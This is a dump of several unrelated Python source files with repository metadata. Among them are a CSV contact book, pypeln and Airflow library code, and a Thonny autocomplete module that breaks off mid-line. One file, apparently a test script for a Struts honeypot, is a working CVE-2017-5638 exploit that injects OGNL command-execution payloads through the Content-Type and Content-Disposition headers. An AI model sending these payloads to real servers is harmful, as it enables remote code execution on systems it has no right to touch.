476d4d814338f37148bbf1504c0dd94a68f55a05
[ "MIT" ]
null
null
null
TestDemo/test1.py
XiMuYouZi/PythonDemo
476d4d814338f37148bbf1504c0dd94a68f55a05
[ "MIT" ]
1
2020-12-11T06:21:32.000Z
2020-12-11T06:21:32.000Z
TestDemo/test1.py
XiMuYouZi/PythonDemo
476d4d814338f37148bbf1504c0dd94a68f55a05
[ "MIT" ]
null
null
null
import re _matches = lambda url, regexs: any(r.search(url) for r in regexs) url = 'https://book.douban.com/tag/BL?start=500&type=R>' patten = re.compile(r'start=\d+\&type=') allow_res = [] allow_res.append(patten) def match(url, allow_res): if allow_res and not _matches(url, allow_res): return False else: return True print(match(url, allow_res))
19.947368
65
0.672823
c7207703f3fd93b06322e53c83ac35058ddc8ac4
4,467
py
Python
contacts.py
MrInternauta/Python-CRUD-a-CSV
ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4
[ "MIT" ]
null
null
null
contacts.py
MrInternauta/Python-CRUD-a-CSV
ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4
[ "MIT" ]
null
null
null
contacts.py
MrInternauta/Python-CRUD-a-CSV
ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import csv class Contact: def __init__(self, name, phone, email): self.name = name self.phone = phone self.email = email class ContactBook: def __init__(self): self._contacts = [] def add(self, name, phone, email): contact = Contact(name, phone, email) self._contacts.append(contact) self._save() print('Contacto añadido') def show_all(self): for contact in self._contacts: self._print_contact(contact) def _print_contact(self,contact): print('--- * --- * --- * --- * --- * --- * --- * ---') print('Nombre: {}'.format(contact.name)) print('Teléfono: {}'.format(contact.phone)) print('Email: {}'.format(contact.email)) print('--- * --- * --- * --- * --- * --- * --- * ---') def delete(self, name): for idx, contact in enumerate(self._contacts): if contact.name.lower() == name.lower(): del self._contacts[idx] self._save() print('Contacto eliminado') break def search(self, name): for contact in self._contacts: if contact.name.upper() == name.upper(): self._print_contact(contact) break def not_found(self): print('*******') print('¡No encontrado!') print('*******') def _save(self): with open('contacts.csv', 'w') as f: writer = csv.writer(f) writer.writerow(('name', 'phone','email')) for contact in self._contacts: writer.writerow((contact.name, contact.phone, contact.email)) def update(self, name, que, data): for idx, contact in enumerate(self._contacts): if contact.name.upper() == name.upper(): if que == 'n': self._contacts[idx].name = data self._print_contact(contact) self._save() break elif que == 't': self._contacts[idx].phone = data self._print_contact(contact) self._save() break elif que == 'e': self._contacts[idx].email = data self._print_contact(contact) self._save() break else: print('El campo que quieres actualizar no existe') break def run(): contact_book = ContactBook() with open('contacts.csv', 'r') as f: reader = csv.reader(f) for idx, row in enumerate(reader): if idx == 0: continue else: contact_book.add(row[0], row[1], row[2]) while True: comando = str(raw_input(''' ...:::CONTACTOS:::... -Teclea una opción- [a]ñadir contacto [ac]tualizar contacto [b]uscar contacto [e]liminar contacto [l]istar contactos [s]alir ''')) print(comando) if comando == 'a': print('...:::Añadir contacto:::...') name = str(raw_input('Ingresar nombre de contacto: ')) phone = str(raw_input('Ingresar telefono de contacto: ')) email = str(raw_input('Ingresar Email de contacto: ')) contact_book.add(name, phone, email) elif comando == 'ac': print('Actualizar contacto') name = str(raw_input('Ingresar nombre de contacto: ')) que = str(raw_input(''' ¿Que desea actualizar? [n]ombre [t]elefono [e]mail ''')) data = str(raw_input('Ingresar el nuevo dato del contacto: ')) contact_book.update( name, que, data) elif comando == 'b': print('Buscar contacto') name = str(raw_input('Ingresar nombre de contacto: ')) contact_book.search(name) elif comando == 'e': print('Eliminar contacto') name = str(raw_input('Ingresar nombre de contacto: ')) contact_book.delete(name) elif comando == 'l': print('Listar contactos') contact_book.show_all() elif comando == 's': break else: print('Error de comando') if __name__ == '__main__': run()
29.979866
77
0.49071
0ebd057e450e1f0162848fa8f312826c2100fc45
3,959
py
Python
test-struts2.py
Cymmetria/StrutsHoneypot
8be5370aa070d5fc39c48b2060d2513c5617525f
[ "MIT" ]
74
2017-03-20T21:55:11.000Z
2022-03-03T15:56:37.000Z
test-struts2.py
Cymmetria/StrutsHoneypot
8be5370aa070d5fc39c48b2060d2513c5617525f
[ "MIT" ]
1
2017-09-08T11:44:05.000Z
2017-09-10T10:27:15.000Z
test-struts2.py
Cymmetria/StrutsHoneypot
8be5370aa070d5fc39c48b2060d2513c5617525f
[ "MIT" ]
21
2017-03-21T10:50:10.000Z
2022-01-24T13:33:48.000Z
#!/usr/bin/python import urllib2 import requests import httplib from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #uso: python script.py <url> "<command>" def exploit_ct(url): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='dir')." payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" try: headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} #request = urllib2.Request(url, headers=headers) request = requests.get(url, headers=headers,verify=False) #page = urllib2.urlopen(request).read() except httplib.IncompleteRead, e: request = e.partial print(request.text) return request def exploit_cd(url): cd_boundary = "---------------------------735323031399963166993862150" content_type = "multipart/form-data; boundary=%s" % (cd_boundary,) filename_payload = "%{(#nike='multipart/form-data')" filename_payload += ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)" filename_payload += ".(#_memberAccess?(#_memberAccess=#dm):(" filename_payload += "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])" filename_payload += ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))" filename_payload += ".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())." filename_payload += "(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." filename_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." filename_payload += "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))." filename_payload += "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))" filename_payload += ".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" cd_name = "foo" cd_payload = "--%s\r\nContent-Disposition: form-data; name=\"%s\"; " cd_payload += "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n" cd_payload = cd_payload % (cd_boundary, cd_name, filename_payload, cd_boundary) try: headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': content_type} #request = urllib2.Request(url, headers=headers) request = requests.post(url, cd_payload, headers=headers,verify=False) #page = urllib2.urlopen(request).read() except httplib.IncompleteRead, e: request = e.partial print(request.text) return request def main(): import sys if len(sys.argv) != 2: print("Usage: %s <url>" % sys.argv[0]) return print(""); print("\te.g: %s http://localhost/" % sys.argv[0]) print(""); print("[*] CVE: 2017-5638 - Apache Struts2 S2-045") url = sys.argv[1] print("[*] cmd: %s\n" % 'dir') print("[*] Attempt #1: Content-Length exploit") exploit_ct(url) print("[*] Attempt #2: Content-Disposition exploit") exploit_cd(url) if __name__ == '__main__': main()
37
152
0.687547
954b7a2b4ac5339d8353223b10e205ca8472d905
19,043
py
Python
pypeln/process/api.py
sackh/pypeln
4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075
[ "MIT" ]
1
2020-07-22T18:19:21.000Z
2020-07-22T18:19:21.000Z
pypeln/process/api.py
sackh/pypeln
4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075
[ "MIT" ]
null
null
null
pypeln/process/api.py
sackh/pypeln
4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075
[ "MIT" ]
null
null
null
""" The `process` module lets you create pipelines using objects from python's [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module according to Pypeln's general [architecture](https://cgarciae.github.io/pypeln/advanced/#architecture). Use this module when you are in need of true parallelism for CPU heavy operations but be aware of its implications. """ import typing from threading import Thread from pypeln import utils as pypeln_utils from . import utils from .stage import Stage ############################################################# # from_iterable ############################################################# class FromIterable(Stage): def __init__(self, iterable, *args, **kwargs): super().__init__(*args, **kwargs) self.iterable = iterable def process(self, worker_namespace): for x in self.iterable: if self.pipeline_namespace.error: return self.output_queues.put(x) def from_iterable( iterable: typing.Iterable = pypeln_utils.UNDEFINED, maxsize: int = None, worker_constructor: typing.Type = Thread, ) -> Stage: """ Creates a stage from an iterable. This function gives you more control of how a stage is created through the `worker_constructor` parameter which can be either: * `threading.Thread`: (default) is efficient for iterables that already have the data in memory like lists or numpy arrays because threads can share memory so no serialization is needed. * `multiprocessing.Process`: is efficient for iterables who's data is not in memory like arbitrary generators and benefit from escaping the GIL. This is inefficient for iterables which have data in memory because they have to be serialized when sent to the background process. Arguments: iterable: a source iterable. maxsize: this parameter is not used and only kept for API compatibility with the other modules. worker_constructor: defines the worker type for the producer stage. Returns: If the `iterable` parameters is given then this function returns a new stage, else it returns a `Partial`. """ if pypeln_utils.is_undefined(iterable): return pypeln_utils.Partial( lambda iterable: from_iterable( iterable, maxsize=None, worker_constructor=worker_constructor ) ) return FromIterable( iterable=iterable, f=None, worker_constructor=worker_constructor, workers=1, maxsize=0, timeout=0, on_start=None, on_done=None, dependencies=[], ) ############################################################# # to_stage ############################################################# def to_stage(obj): if isinstance(obj, Stage): return obj elif hasattr(obj, "__iter__"): return from_iterable(obj) else: raise ValueError(f"Object {obj} is not a Stage or iterable") ############################################################# # map ############################################################# class Map(Stage): def apply(self, x, **kwargs): y = self.f(x, **kwargs) self.output_queues.put(y) def map( f: typing.Callable, stage: Stage = pypeln_utils.UNDEFINED, workers: int = 1, maxsize: int = 0, timeout: float = 0, on_start: typing.Callable = None, on_done: typing.Callable = None, ) -> Stage: """ Creates a stage that maps a function `f` over the data. Its intended to behave like python's built-in `map` function but with the added concurrency. ```python import pypeln as pl import time from random import random def slow_add1(x): time.sleep(random()) # <= some slow computation return x + 1 data = range(10) # [0, 1, 2, ..., 9] stage = pl.process.map(slow_add1, data, workers=3, maxsize=4) data = list(stage) # e.g. [2, 1, 5, 6, 3, 4, 7, 8, 9, 10] ``` !!! note Because of concurrency order is not guaranteed. Arguments: f: A function with signature `f(x, **kwargs) -> y`, where `kwargs` is the return of `on_start` if present. stage: A stage or iterable. workers: The number of workers the stage should contain. maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded. on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining. on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes. Returns: If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`. """ if pypeln_utils.is_undefined(stage): return pypeln_utils.Partial( lambda stage: map( f, stage=stage, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, ) ) stage = to_stage(stage) return Map( f=f, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, dependencies=[stage], ) ############################################################# # flat_map ############################################################# class FlatMap(Stage): def apply(self, x, **kwargs): for y in self.f(x, **kwargs): self.output_queues.put(y) def flat_map( f: typing.Callable, stage: Stage = pypeln_utils.UNDEFINED, workers: int = 1, maxsize: int = 0, timeout: float = 0, on_start: typing.Callable = None, on_done: typing.Callable = None, ) -> Stage: """ Creates a stage that maps a function `f` over the data, however unlike `pypeln.process.map` in this case `f` returns an iterable. As its name implies, `flat_map` will flatten out these iterables so the resulting stage just contains their elements. ```python import pypeln as pl import time from random import random def slow_integer_pair(x): time.sleep(random()) # <= some slow computation if x == 0: yield x else: yield x yield -x data = range(10) # [0, 1, 2, ..., 9] stage = pl.process.flat_map(slow_integer_pair, data, workers=3, maxsize=4) list(stage) # e.g. [2, -2, 3, -3, 0, 1, -1, 6, -6, 4, -4, ...] ``` !!! note Because of concurrency order is not guaranteed. `flat_map` is a more general operation, you can actually implement `pypeln.process.map` and `pypeln.process.filter` with it, for example: ```python import pypeln as pl pl.process.map(f, stage) = pl.process.flat_map(lambda x: [f(x)], stage) pl.process.filter(f, stage) = pl.process.flat_map(lambda x: [x] if f(x) else [], stage) ``` Using `flat_map` with a generator function is very useful as e.g. you are able to filter out unwanted elements when there are exceptions, missing data, etc. Arguments: f: A function with signature `f(x, **kwargs) -> Iterable`, where `kwargs` is the return of `on_start` if present. stage: A stage or iterable. workers: The number of workers the stage should contain. maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded. on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining. on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes. Returns: If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`. """ if pypeln_utils.is_undefined(stage): return pypeln_utils.Partial( lambda stage: flat_map( f, stage=stage, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, ) ) stage = to_stage(stage) return FlatMap( f=f, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, dependencies=[stage], ) ############################################################# # filter ############################################################# class Filter(Stage): def apply(self, x, **kwargs): if self.f(x, **kwargs): self.output_queues.put(x) def filter( f: typing.Callable, stage: Stage = pypeln_utils.UNDEFINED, workers: int = 1, maxsize: int = 0, timeout: float = 0, on_start: typing.Callable = None, on_done: typing.Callable = None, ) -> Stage: """ Creates a stage that filter the data given a predicate function `f`. It is intended to behave like python's built-in `filter` function but with the added concurrency. ```python import pypeln as pl import time from random import random def slow_gt3(x): time.sleep(random()) # <= some slow computation return x > 3 data = range(10) # [0, 1, 2, ..., 9] stage = pl.process.filter(slow_gt3, data, workers=3, maxsize=4) data = list(stage) # e.g. [5, 6, 3, 4, 7, 8, 9] ``` !!! note Because of concurrency order is not guaranteed. Arguments: f: A function with signature `f(x, **kwargs) -> bool`, where `kwargs` is the return of `on_start` if present. stage: A stage or iterable. workers: The number of workers the stage should contain. maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded. on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining. on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes. Returns: If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`. """ if pypeln_utils.is_undefined(stage): return pypeln_utils.Partial( lambda stage: filter( f, stage=stage, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, ) ) stage = to_stage(stage) return Filter( f=f, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, dependencies=[stage], ) ############################################################# # each ############################################################# class Each(Stage): def apply(self, x, **kwargs): self.f(x, **kwargs) def each( f: typing.Callable, stage: Stage = pypeln_utils.UNDEFINED, workers: int = 1, maxsize: int = 0, timeout: float = 0, on_start: typing.Callable = None, on_done: typing.Callable = None, run: bool = False, ) -> Stage: """ Creates a stage that runs the function `f` for each element in the data but the stage itself yields no elements. Its useful for sink stages that perform certain actions such as writting to disk, saving to a database, etc, and dont produce any results. For example: ```python import pypeln as pl def process_image(image_path): image = load_image(image_path) image = transform_image(image) save_image(image_path, image) files_paths = get_file_paths() stage = pl.process.each(process_image, file_paths, workers=4) pl.process.run(stage) ``` or alternatively ```python files_paths = get_file_paths() pl.process.each(process_image, file_paths, workers=4, run=True) ``` !!! note Because of concurrency order is not guaranteed. Arguments: f: A function with signature `f(x, **kwargs) -> None`, where `kwargs` is the return of `on_start` if present. stage: A stage or iterable. workers: The number of workers the stage should contain. maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded. on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining. on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes. run: Whether or not to execute the stage immediately. Returns: If the `stage` parameters is not given then this function returns a `Partial`, else if `run=False` (default) it return a new stage, if `run=True` then it runs the stage and returns `None`. """ if pypeln_utils.is_undefined(stage): return pypeln_utils.Partial( lambda stage: each( f, stage=stage, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, ) ) stage = to_stage(stage) stage = Each( f=f, workers=workers, maxsize=maxsize, timeout=timeout, on_start=on_start, on_done=on_done, dependencies=[stage], ) if not run: return stage for _ in stage: pass ############################################################# # concat ############################################################# class Concat(Stage): def apply(self, x): self.output_queues.put(x) def concat(stages: typing.List[Stage], maxsize: int = 0) -> Stage: """ Concatenates / merges many stages into a single one by appending elements from each stage as they come, order is not preserved. ```python import pypeln as pl stage_1 = [1, 2, 3] stage_2 = [4, 5, 6, 7] stage_3 = pl.process.concat([stage_1, stage_2]) # e.g. [1, 4, 5, 2, 6, 3, 7] ``` Arguments: stages: a list of stages or iterables. maxsize: the maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. Returns: A stage object. """ stages = [to_stage(stage) for stage in stages] return Concat( f=None, workers=1, maxsize=maxsize, timeout=0, on_start=None, on_done=None, dependencies=stages, ) ############################################################# # run ############################################################# def run(stages: typing.List[Stage], maxsize: int = 0) -> None: """ Iterates over one or more stages until their iterators run out of elements. ```python import pypeln as pl data = get_data() stage = pl.process.each(slow_fn, data, workers=6) # execute pipeline pl.process.run(stage) ``` Arguments: stages: A stage/iterable or list of stages/iterables to be iterated over. If a list is passed, stages are first merged using `concat` before iterating. maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. """ if isinstance(stages, list) and len(stages) == 0: raise ValueError("Expected at least 1 stage to run") elif isinstance(stages, list): stage = concat(stages, maxsize=maxsize) else: stage = stages stage = to_iterable(stage, maxsize=maxsize) for _ in stages: pass ############################################################# # to_iterable ############################################################# def to_iterable( stage: Stage = pypeln_utils.UNDEFINED, maxsize: int = 0 ) -> typing.Iterable: """ Creates an iterable from a stage. Arguments: stage: A stage object. maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded. Returns: If the `stage` parameters is given then this function returns an iterable, else it returns a `Partial`. """ if pypeln_utils.is_undefined(stage): return pypeln_utils.Partial(lambda stage: to_iterable(stage, maxsize=maxsize)) if isinstance(stage, Stage): iterable = stage.to_iterable(maxsize=maxsize) else: iterable = stage return iterable
34.560799
375
0.60899
b8f7f02ca721b2c2f8034f2d68772722f1c0f5ac
592
py
Python
earthshotsoil/env_data.py
qAp/earthshotsoil
29386e80f4e0188cd69334d7ddb526d923732f14
[ "Apache-2.0" ]
null
null
null
earthshotsoil/env_data.py
qAp/earthshotsoil
29386e80f4e0188cd69334d7ddb526d923732f14
[ "Apache-2.0" ]
null
null
null
earthshotsoil/env_data.py
qAp/earthshotsoil
29386e80f4e0188cd69334d7ddb526d923732f14
[ "Apache-2.0" ]
null
null
null
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_environ_covariates.ipynb (unless otherwise specified). __all__ = ['URLs', 'n', 'n'] # Cell import os from urlpath import URL import easydict import requests import math import numpy as np import xarray as xr import rioxarray # Cell URLs = easydict.EasyDict() # Cell n = 'EarthEnvCloudCover_MODCF_interannualSD' URLs[n] = URL('https://data.earthenv.org/cloud/' 'MODCF_interannualSD.tif') # Cell n = 'EarthEnvCloudCover_MODCF_intraannualSD' URLs[n] = URL('https://data.earthenv.org/cloud/' 'MODCF_intraannualSD.tif')
22.769231
105
0.733108
b39dba5b4eab1c27a07e95bdff765b5c9c70885f
4,381
py
Python
airflow/providers/amazon/aws/sensors/glue_catalog_partition.py
augusto-herrmann/airflow
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
[ "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0", "BSD-3-Clause" ]
4
2021-06-26T13:37:35.000Z
2022-01-11T15:49:44.000Z
airflow/providers/amazon/aws/sensors/glue_catalog_partition.py
augusto-herrmann/airflow
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
[ "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0", "BSD-3-Clause" ]
33
2021-07-25T10:29:30.000Z
2022-03-30T04:39:06.000Z
airflow/providers/amazon/aws/sensors/glue_catalog_partition.py
augusto-herrmann/airflow
7ee4295dd3f7dba4fcd763286c7823bb1707fe99
[ "Apache-2.0", "BSD-2-Clause", "MIT", "ECL-2.0", "BSD-3-Clause" ]
null
null
null
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import warnings from typing import TYPE_CHECKING, Optional, Sequence from airflow.providers.amazon.aws.hooks.glue_catalog import GlueCatalogHook from airflow.sensors.base import BaseSensorOperator if TYPE_CHECKING: from airflow.utils.context import Context class GlueCatalogPartitionSensor(BaseSensorOperator): """ Waits for a partition to show up in AWS Glue Catalog. :param table_name: The name of the table to wait for, supports the dot notation (my_database.my_table) :type table_name: str :param expression: The partition clause to wait for. This is passed as is to the AWS Glue Catalog API's get_partitions function, and supports SQL like notation as in ``ds='2015-01-01' AND type='value'`` and comparison operators as in ``"ds>=2015-01-01"``. See https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-partitions.html #aws-glue-api-catalog-partitions-GetPartitions :type expression: str :param aws_conn_id: ID of the Airflow connection where credentials and extra configuration are stored :type aws_conn_id: str :param region_name: Optional aws region name (example: us-east-1). Uses region from connection if not specified. :type region_name: str :param database_name: The name of the catalog database where the partitions reside. :type database_name: str :param poke_interval: Time in seconds that the job should wait in between each tries :type poke_interval: int """ template_fields: Sequence[str] = ( 'database_name', 'table_name', 'expression', ) ui_color = '#C5CAE9' def __init__( self, *, table_name: str, expression: str = "ds='{{ ds }}'", aws_conn_id: str = 'aws_default', region_name: Optional[str] = None, database_name: str = 'default', poke_interval: int = 60 * 3, **kwargs, ): super().__init__(poke_interval=poke_interval, **kwargs) self.aws_conn_id = aws_conn_id self.region_name = region_name self.table_name = table_name self.expression = expression self.database_name = database_name self.hook: Optional[GlueCatalogHook] = None def poke(self, context: 'Context'): """Checks for existence of the partition in the AWS Glue Catalog table""" if '.' in self.table_name: self.database_name, self.table_name = self.table_name.split('.') self.log.info( 'Poking for table %s. %s, expression %s', self.database_name, self.table_name, self.expression ) return self.get_hook().check_for_partition(self.database_name, self.table_name, self.expression) def get_hook(self) -> GlueCatalogHook: """Gets the GlueCatalogHook""" if self.hook: return self.hook self.hook = GlueCatalogHook(aws_conn_id=self.aws_conn_id, region_name=self.region_name) return self.hook class AwsGlueCatalogPartitionSensor(GlueCatalogPartitionSensor): """ This sensor is deprecated. Please use :class:`airflow.providers.amazon.aws.sensors.glue_catalog_partition.GlueCatalogPartitionSensor`. """ def __init__(self, *args, **kwargs): warnings.warn( "This sensor is deprecated. " "Please use :class:`airflow.providers.amazon.aws.sensors.glue_catalog_partition.GlueCatalogPartitionSensor`.", # noqa: 501 DeprecationWarning, stacklevel=2, ) super().__init__(*args, **kwargs)
38.429825
135
0.688884
8cab8cad858eaa54991104c33aa0adee1d6a9ee0
265
py
Python
ex10.py
Ma-Min-Min/python-exercises
1b0d63456d88b4750f89821782812becf4177375
[ "MIT" ]
null
null
null
ex10.py
Ma-Min-Min/python-exercises
1b0d63456d88b4750f89821782812becf4177375
[ "MIT" ]
null
null
null
ex10.py
Ma-Min-Min/python-exercises
1b0d63456d88b4750f89821782812becf4177375
[ "MIT" ]
null
null
null
tabby_cat = "\tI'm tabbed in." persian_cat = "\I'm split \non a line." backslash_cat = "I'm \\ a \\ cat." fat_cat = """ I'll do a list: \t* Cat food \t* Fishies \t* Catnip\n\t* Grass """ print (tabby_cat) print (persian_cat) print (backslash_cat) print (fat_cat)
16.5625
39
0.649057
e2e250ae8f857a236eb45b9a13ccca433ea81fc8
11,011
py
Python
thonny/plugins/autocomplete.py
aroberge/thonny
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
[ "MIT" ]
null
null
null
thonny/plugins/autocomplete.py
aroberge/thonny
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
[ "MIT" ]
null
null
null
thonny/plugins/autocomplete.py
aroberge/thonny
919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28
[ "MIT" ]
null
null
null
import tkinter as tk from tkinter import messagebox from thonny import get_runner, get_workbench from thonny.codeview import CodeViewText from thonny.common import InlineCommand from thonny.shell import ShellText # TODO: adjust the window position in cases where it's too close to bottom or right edge - but make sure the current line is shown """Completions get computed on the backend, therefore getting the completions is asynchronous. """ class Completer(tk.Listbox): def __init__(self, text): tk.Listbox.__init__( self, master=text, font="SmallEditorFont", activestyle="dotbox", exportselection=False, ) self.text = text self.completions = [] self.doc_label = tk.Label( master=text, text="Aaappiiiii", bg="#ffffe0", justify="left", anchor="nw" ) # Auto indenter will eat up returns, therefore I need to raise the priority # of this binding self.text_priority_bindtag = "completable" + str(self.text.winfo_id()) self.text.bindtags((self.text_priority_bindtag,) + self.text.bindtags()) self.text.bind_class( self.text_priority_bindtag, "<Key>", self._on_text_keypress, True ) self.text.bind( "<<TextChange>>", self._on_text_change, True ) # Assuming TweakableText # for cases when Listbox gets focus self.bind("<Escape>", self._close) self.bind("<Return>", self._insert_current_selection) self.bind("<Double-Button-1>", self._insert_current_selection) self._bind_result_event() def _bind_result_event(self): # TODO: remove binding when editor gets closed get_workbench().bind( "editor_autocomplete_response", self._handle_backend_response, True ) def handle_autocomplete_request(self): row, column = self._get_position() source = self.text.get("1.0", "end-1c") get_runner().send_command( InlineCommand( "editor_autocomplete", source=source, row=row, column=column, filename=self._get_filename(), ) ) def _handle_backend_response(self, msg): row, column = self._get_position() source = self.text.get("1.0", "end-1c") if msg.source != source or msg.row != row or msg.column != column: # situation has changed, information is obsolete self._close() elif msg.error: self._close() messagebox.showerror( "Autocomplete error", msg.error, parent=get_workbench() ) else: self._present_completions(msg.completions) def _present_completions(self, completions): self.completions = completions # broadcast logging info row, column = self._get_position() get_workbench().event_generate( "AutocompleteProposal", text_widget=self.text, row=row, column=column, proposal_count=len(completions), ) # present if len(completions) == 0: self._close() elif len(completions) == 1: self._insert_completion(completions[0]) # insert the only completion self._close() else: self._show_box(completions) def _show_box(self, completions): self.delete(0, self.size()) self.insert( 0, *[ c["name"] + ("=" if c["complete"].endswith("=") else "") for c in completions ] ) self.activate(0) self.selection_set(0) # place box if not self._is_visible(): # _, _, _, list_box_height = self.bbox(0) height = 100 # min(150, list_box_height * len(completions) * 1.15) typed_name_length = len(completions[0]["name"]) - len( completions[0]["complete"] ) text_box_x, text_box_y, _, text_box_height = self.text.bbox( "insert-%dc" % typed_name_length ) # should the box appear below or above cursor? space_below = self.master.winfo_height() - text_box_y - text_box_height space_above = text_box_y if space_below >= height or space_below > space_above: height = min(height, space_below) y = text_box_y + text_box_height else: height = min(height, space_above) y = text_box_y - height width = 400 self.place(x=text_box_x, y=y, width=width, height=height) self._update_doc() def _update_doc(self): c = self._get_selected_completion() if c is None: self.doc_label["text"] = "" self.doc_label.place_forget() else: docstring = c.get("docstring", None) if docstring: self.doc_label["text"] = docstring self.doc_label.place( x=self.winfo_x() + self.winfo_width(), y=self.winfo_y(), width=400, height=self.winfo_height(), ) else: self.doc_label["text"] = "" self.doc_label.place_forget() def _is_visible(self): return self.winfo_ismapped() def _insert_completion(self, completion): typed_len = len(completion["name"]) - len(completion["complete"].strip("=")) typed_prefix = 